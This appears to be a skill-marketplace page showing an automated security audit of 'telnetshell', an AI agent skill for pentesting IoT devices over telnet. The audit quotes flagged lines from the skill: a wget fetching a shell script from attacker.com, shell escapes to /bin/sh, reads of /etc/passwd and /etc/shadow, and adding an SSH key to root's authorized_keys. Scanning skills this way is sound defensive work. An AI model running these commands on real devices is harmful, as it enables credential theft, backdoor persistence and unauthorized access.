Skip to main content

telnetshell

Enables interaction with IoT device shells via telnet for pentesting, supporting enumeration, vulnerability discovery, and credential testing.

Install this skill

or
0/100

Security score

The telnetshell skill was audited on Feb 12, 2026 and we found 18 security issues across 5 threat categories, including 7 high-severity. Review the findings below before installing.

Categories Tested

Security Issues

high line 13

System command execution

SourceSKILL.md
13- telnet client installed on the system (`sudo pacman -S inetutils` on Arch)
medium line 442

System command execution

SourceSKILL.md
442awk 'BEGIN {system("/bin/sh")}'
medium line 242

Wget to non-GitHub URL

SourceSKILL.md
242wget http://attacker.com/shell.sh
high line 169

Access to /etc/passwd

SourceSKILL.md
169$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "cat /etc/passwd"
high line 293

Access to /etc/passwd

SourceSKILL.md
293cat /etc/passwd
high line 440

Access to /etc/passwd

SourceSKILL.md
440less /etc/passwd # Then !/bin/sh
high line 294

Access to /etc/shadow

SourceSKILL.md
294cat /etc/shadow # If readable - major security issue!
medium line 368

Access to root home directory

SourceSKILL.md
368mkdir -p /root/.ssh
medium line 369

Access to root home directory

SourceSKILL.md
369echo "your_ssh_public_key" >> /root/.ssh/authorized_keys
medium line 370

Access to root home directory

SourceSKILL.md
370chmod 600 /root/.ssh/authorized_keys
medium line 371

Access to root home directory

SourceSKILL.md
371chmod 700 /root/.ssh
high line 369

Access to SSH directory

SourceSKILL.md
369echo "your_ssh_public_key" >> /root/.ssh/authorized_keys
high line 370

Access to SSH directory

SourceSKILL.md
370chmod 600 /root/.ssh/authorized_keys
medium line 424

Prompting for password/secret input

SourceSKILL.md
424# If you encounter a password prompt, the helper will detect it
low line 242

External URL reference

SourceSKILL.md
242wget http://attacker.com/shell.sh
low line 404

External URL reference

SourceSKILL.md
404# Then download from http://device_ip:8000/rootfs.bin
low line 535

External URL reference

SourceSKILL.md
535- [BusyBox Official Site](https://busybox.net/)
low line 536

External URL reference

SourceSKILL.md
536- [BusyBox Command List](https://busybox.net/downloads/BusyBox.html)
Scanned on Feb 12, 2026
View Security Dashboard
Installation guide →
GitHub Stars 55
Rate this skill
Categorydevelopment
UpdatedMay 21, 2026
NeverSight/skills_feed